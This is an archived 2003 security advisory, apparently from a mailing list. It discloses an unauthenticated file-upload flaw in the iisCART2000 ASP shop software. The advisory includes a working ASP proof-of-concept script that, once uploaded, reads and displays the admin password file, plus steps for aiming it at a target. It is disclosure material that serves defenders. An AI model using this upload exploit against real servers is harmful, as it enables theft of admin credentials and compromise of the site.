1ndonesian Security Team (1st) http://bosen.net/releases/ ======================================================================= ======================= Security Advisory Advisory Name: iisCart2000 Administration Security Leak Release Date: 05/10/2003 Application: Latest Platform: Win32 Severity: High/Remote BUG Type: Security Leak Author: Bosen <mobileat_private> Discover by: Bosen <mobileat_private> Vendor Status: Notified, see response below. Vendor URL: http://www.iiscart.com Reference: http://bosen.net/releases/ Overview: iisCART2000 is a next generation ASP component based Ecommerce solution. With over 150 methods and properties, iisCART2000 puts significant new features in the hands of ASP web masters and developers. Building on 2 years of development, iisCART2000 incorporates clients suggestions as well as many ground breaking developer contributions. iisCART2000 adds browser based file upload functionality. This new feature allows you to upload images at the same time you are adding data to the items table in your database without having to use FTP or FrontPage. iisCART2000 even fills in the image path information for subsequent dynamic display. Unfortunetly this browser based file upload has a leak. Which is couse an attacker can upload any type of file including .asp into web server. Details: iiCART2k comes with 2 type. The advance and the basic version. In the advance version vulnerability lies on /admin/upload.asp, and in the basic version lies on /upload.asp. Both of the script does not check priviledge. And they all unprotected. These will couse any attacker upload thei malicious file/script/programs/ into server. Not just that, beside you can upload it via your own form. The iisCART2K it self provide both /admin/upload.htm and /upload.htm that makes attacker would be more easier to do they job. And again since the file extention is .htm, it doesnt check any privilegde permission also. Exploits: These is a little demonstration how to get some information including admin login and passwd and also database information. iisCart2k-nice.asp ---START--- // 1ndonesian Security Team // http://bosen.net/releases/ // <% @ Language = JScript %> <% function WinPath(absPath) {this.absolutePath = absPath;} function getAbsPath() {return this.absolutePath;} WinPath.prototype.getAbsolutePath = getAbsPath; function fileRead(file) { var FSO = new ActiveXObject("Scripting.FileSystemObject"), strOut = "" var tmp = file, f, g = FSO.GetFile(tmp); f = FSO.OpenTextFile(tmp, 1, false); strOut = "<PRE STYLE=\"font-size:9pt;\">"; strOut+= Server.HTMLEncode(f.ReadAll()); strOut+= "</PRE>"; f.Close(); return(strOut); } var a = new WinPath(Server.Mappath("/")); var curDir = a.getAbsolutePath(); // You can change these var admin = curDir + "\\advanced\\admin\\pswd.asp"; with (Response) { Write("<b>ServerRoot : "+curDir+"<br></b>"); Write("<b>Admin Info : "+admin+"<br><br></b>"); Write(fileRead(admin)); } %> ---END-- Upload this file, and browse it. It will shows you current configurations file. You may change the admin path, and db path, depend on target URL. Vendor Response: No Response Recommendation: a. Put these code in top of the line of upload.asp <!--#include file="pswd.asp" --> 1ndonesian Security Team (1st) Advisory: http://bosen.net/releases/ About 1ndonesian Security Team: 1ndonesian Security Team, research and develop intelligent, advanced application security assessment. Based in Indonesia, 1ndonesian Security Team offers best of breed security consulting services, specialising in application, host and network security assessments. 1st provides security information and patches for use by the entire 1st community. This information is provided freely to all interested parties and may be redistributed provided that it is not altered in any way, 1st is appropriately credited and the document retains. Greetz to: AresU, TioEuy, sakitjiwa, syzwz, and all 1ndonesian Security Team Bosen <mobileat_private> ====================== Original document can be fount at http://bosen.net/releases/?id=31 ----------------------------------------------- This mail sent through http://webmail.bosen.net
This archive was generated by hypermail 2b30 : Sun Jun 01 2003 - 10:03:05 PDT